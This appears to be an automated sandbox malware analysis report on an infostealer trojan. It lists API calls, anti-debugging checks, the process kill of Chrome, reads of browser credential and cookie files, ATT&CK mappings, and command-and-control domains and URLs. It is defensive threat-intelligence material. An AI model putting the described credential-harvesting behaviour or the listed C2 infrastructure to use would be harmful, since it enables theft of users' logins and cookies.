Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00440314 __EH_prolog3_GS,LoadLibraryW,GetProcAddress,#17,0_2_00440314
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00446490 mov eax, dword ptr fs:[00000030h]0_2_00446490
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h]0_2_10019DE0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h]0_2_10019E13
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h]0_2_10019E13
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]0_2_10019E70
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]0_2_10019E70
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]0_2_10019ED0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019DE0 mov eax, dword ptr fs:[00000030h]3_2_10019DE0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019E13 mov eax, dword ptr fs:[00000030h]3_2_10019E13
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019E13 mov eax, dword ptr fs:[00000030h]3_2_10019E13
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019E70 mov eax, dword ptr fs:[00000030h]3_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019E70 mov eax, dword ptr fs:[00000030h]3_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10019ED0 mov eax, dword ptr fs:[00000030h]3_2_10019ED0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00419AD9 GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,_strlen,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,ReadFile,GetProcessHeap,HeapFree,0_2_00419AD9
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044A9CB SetUnhandledExceptionFilter,0_2_0044A9CB
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044A9EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044A9EE
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,0_2_10015354
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,0_2_10015376
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_10018413
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000E44D
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,3_2_10015354
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,3_2_10015376
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,3_2_10018413
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1000E44D
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B461F SetUnhandledExceptionFilter,30_2_002B461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B1C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_002B1C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_002B373A
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_002B631F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0043997A __EH_prolog3_GS,_memset,_memset,_memset,_memset,_memset,_memset,InitializeSecurityDescriptor,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,SetEntriesInAclW,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorDacl,CoInitializeSecurity,0_2_0043997A
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004403BB __EH_prolog3_GS,GetCurrentThread,OpenThreadToken,GetLastError,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,0_2_004403BB
Source: fnhcdXEfus.exeBinary or memory string: Shell_TrayWnd
Source: fnhcdXEfus.exeBinary or memory string: AShell_TrayWnd0x0409
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001779F cpuid 0_2_1001779F
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: GetLocaleInfoW,TranslateCharsetInfo,IsValidLocale,0_2_0043FC89
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: GetLocaleInfoW,0_2_0043FD0E
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: GetLocaleInfoA,0_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: GetLocaleInfoA,3_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: GetLocaleInfoA,30_2_002B7189
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,0_2_10019780
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00438713 __EH_prolog3_GS,GetSystemTimeAsFileTime,0_2_00438713
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00458F45 GetVersionExW,0_2_00458F45
Source: C:\Users\user\Desktop\fnhcdXEfus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistoryJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryPeripheral Device Discovery11Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsCommand and Scripting Interpreter2Browser Extensions1Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Bootkit1Process Injection12Install Root Certificate2NTDSSystem Information Discovery59Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsQuery Registry2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery461VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncVirtualization/Sandbox Evasion13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion13Proc FilesystemProcess Discovery4Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowRemote System Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronBootkit1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 346325 Sample: fnhcdXEfus.exe Startdate: 30/01/2021 Architecture: WINDOWS Score: 90 93 Malicious sample detected (through community Yara rule) 2->93 95 Multi AV Scanner detection for submitted file 2->95 97 Uses ping.exe to sleep 2->97 99 3 other signatures 2->99 8 fnhcdXEfus.exe 1 3 2->8         started        13 msiexec.exe 2->13         started        process3 dnsIp4 71 c8dd8ae6dc4dc644.xyz 34.94.64.66, 49719, 49722, 49723 GOOGLEUS United States 8->71 67 C:\Users\user\...\63C4F3D9EA0CC861.exe, PE32 8->67 dropped 69 C:\...\63C4F3D9EA0CC861.exe:Zone.Identifier, ASCII 8->69 dropped 101 Detected unpacking (creates a PE file in dynamic memory) 8->101 103 Installs new ROOT certificates 8->103 105 Contains functionality to infect the boot sector 8->105 107 4 other signatures 8->107 15 63C4F3D9EA0CC861.exe 26 8->15         started        20 63C4F3D9EA0CC861.exe 1 15 8->20         started        22 cmd.exe 1 8->22         started        24 msiexec.exe 4 8->24         started        file5 signatures6 process7 dnsIp8 73 c8dd8ae6dc4dc644.xyz 15->73 75 C8DD8AE6DC4DC644.xyz 15->75 53 C:\Users\user\AppData\...\1612045890161.exe, PE32 15->53 dropped 55 C:\Users\user\AppData\Local\Temp\xldl.dll, PE32 15->55 dropped 57 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 15->57 dropped 65 7 other files (none is malicious) 15->65 dropped 81 Multi AV Scanner detection for dropped file 15->81 83 Machine Learning detection for dropped file 15->83 85 Contains functionality to infect the boot sector 15->85 87 Contains functionality to detect sleep reduction / modifications 15->87 26 cmd.exe 15->26         started        29 1612045890161.exe 2 15->29         started        31 ThunderFW.exe 1 15->31         started        77 c8dd8ae6dc4dc644.xyz 20->77 59 C:\Users\user\AppData\...\Secure Preferences, UTF-8 20->59 dropped 61 C:\Users\user\AppData\Local\...\Preferences, ASCII 20->61 dropped 89 Tries to harvest and steal browser information (history, passwords, etc) 20->89 33 cmd.exe 1 20->33         started        35 cmd.exe 1 20->35         started        79 127.0.0.1 unknown unknown 22->79 91 Uses ping.exe to sleep 22->91 37 conhost.exe 22->37         started        39 PING.EXE 1 22->39         started        63 C:\Users\user\AppData\Local\...\MSI6DDB.tmp, PE32 24->63 dropped file9 signatures10 process11 signatures12 41 conhost.exe 26->41         started        43 PING.EXE 26->43         started        109 Uses ping.exe to sleep 33->109 45 conhost.exe 33->45         started        47 PING.EXE 1 33->47         started        49 taskkill.exe 1 35->49         started        51 conhost.exe 35->51         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
fnhcdXEfus.exe74%VirustotalBrowse
fnhcdXEfus.exe35%MetadefenderBrowse
fnhcdXEfus.exe83%ReversingLabsWin32.Trojan.Mingloa
fnhcdXEfus.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe35%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe83%ReversingLabsWin32.Trojan.Mingloa
C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe8%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe2%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\atl71.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_engine.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\download_engine.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\xldl.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\1612045890161.exe3%MetadefenderBrowse
C:\Users\user\AppData\Roaming\1612045890161.exe14%ReversingLabsWin32.Infostealer.EdgeCookiesView

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://C8DD8AE6DC4DC644.xyz/info_old/ddd1%VirustotalBrowse
http://C8DD8AE6DC4DC644.xyz/info_old/ddd0%Avira URL Cloudsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chromeH0%Avira URL Cloudsafe
https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
https://twitter.comsec-fetch-dest:0%Avira URL Cloudsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://ocsp.pki.goog/GTSGIAG300%Avira URL Cloudsafe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css0%Avira URL Cloudsafe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370%Avira URL Cloudsafe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b50%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://pki.goog/gsr2/GTSGIAG3.crt0)0%Avira URL Cloudsafe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:0%Avira URL Cloudsafe
http://C8DD8AE6DC4DC644.xyz/info_old/w0%Avira URL Cloudsafe
http://c8dd8ae6dc4dc644.xyz//fine/send0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt0#0%Avira URL Cloudsafe
http://c8dd8ae6dc4dc644.xyz/info_old/r0%Avira URL Cloudsafe
https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
http://c8dd8ae6dc4dc644.xyz/info_old/e0%Avira URL Cloudsafe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.0%Avira URL Cloudsafe
http://c8dd8ae6dc4dc644.xyz/info_old/g0%Avira URL Cloudsafe
https://www.instagram.comsec-fetch-mode:0%Avira URL Cloudsafe
https://twitter.comReferer:0%Avira URL Cloudsafe
http://www.interestvideo.com/video1.php0%Avira URL Cloudsafe
http://C8DD8AE6DC4DC644.xyz:80/info_old/r0%Avira URL Cloudsafe
http://C8DD8AE6DC4DC644.xyz:80/info_old/w0%Avira URL Cloudsafe
http://crl.pki.goog/GTSGIAG3.crl00%Avira URL Cloudsafe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt0%Avira URL Cloudsafe
https://1A469593C1FE15DC.xyz/0%Avira URL Cloudsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
C8DD8AE6DC4DC644.xyz
34.94.64.66
truefalse
    		unknown
    c8dd8ae6dc4dc644.xyz
    		34.94.64.66
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://C8DD8AE6DC4DC644.xyz/info_old/dddfalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://c8dd8ae6dc4dc644.xyz//fine/sendfalse
      • Avira URL Cloud: safe
      		unknown
      http://c8dd8ae6dc4dc644.xyz/info_old/wfalse
        		unknown
        http://c8dd8ae6dc4dc644.xyz/info_old/rfalse
        • Avira URL Cloud: safe
        		unknown
        http://c8dd8ae6dc4dc644.xyz/info_old/efalse
        • Avira URL Cloud: safe
        		unknown
        http://c8dd8ae6dc4dc644.xyz/info_old/gfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplateecvB803.tmp.11.drfalse
          		high
          https://duckduckgo.com/chrome_newtab63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
            		high
            https://duckduckgo.com/ac/?q=63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
              		high
              http://www.interoperabilitybridges.com/wmp-extension-for-chromeH63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.messenger.com/63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                		high
                http://www.msn.comecvB803.tmp.11.drfalse
                  		high
                  http://www.nirsoft.net1612045890161.exe, 0000000B.00000002.267608441.0000000000198000.00000004.00000010.sdmpfalse
                    		high
                    https://deff.nelreports.net/api/report?cat=msnecvB803.tmp.11.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://twitter.com/ookie:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                      		high
                      https://twitter.comsec-fetch-dest:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fecvB803.tmp.11.drfalse
                        		high
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.pki.goog/gts1o1core0ecvB803.tmp.11.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://maps.windows.com/windows-app-web-linkecvB803.tmp.11.drfalse
                          		high
                          http://www.msn.com/?ocid=iehpecvB803.tmp.11.drfalse
                            		high
                            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166ecvB803.tmp.11.drfalse
                              		high
                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3ecvB803.tmp.11.drfalse
                                		high
                                https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msnecvB803.tmp.11.drfalse
                                  		high
                                  http://crl.pki.goog/GTS1O1core.crl0ecvB803.tmp.11.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.messenger.com63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.nirsoft.net/1612045890161.exe, 1612045890161.exe.3.drfalse
                                      		high
                                      http://forms.real.com/real/realone/download.html?type=rpsp_us63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpfalse
                                        		high
                                        http://ocsp.pki.goog/GTSGIAG30ecvB803.tmp.11.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%263C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                          		high
                                          https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.cssecvB803.tmp.11.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe63C4F3D9EA0CC861.exe, 00000003.00000003.364210797.000000000394C000.00000004.00000040.sdmpfalse
                                            		high
                                            https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937ecvB803.tmp.11.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5ecvB803.tmp.11.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                              		high
                                              https://www.instagram.com/63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/soap/encoding/download_engine.dll.3.drfalse
                                                  		high
                                                  http://www.xunlei.com/GETdownload_engine.dll.3.drfalse
                                                    		high
                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeecvB803.tmp.11.drfalse
                                                      		high
                                                      https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://www.messenger.com/origin:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                          		high
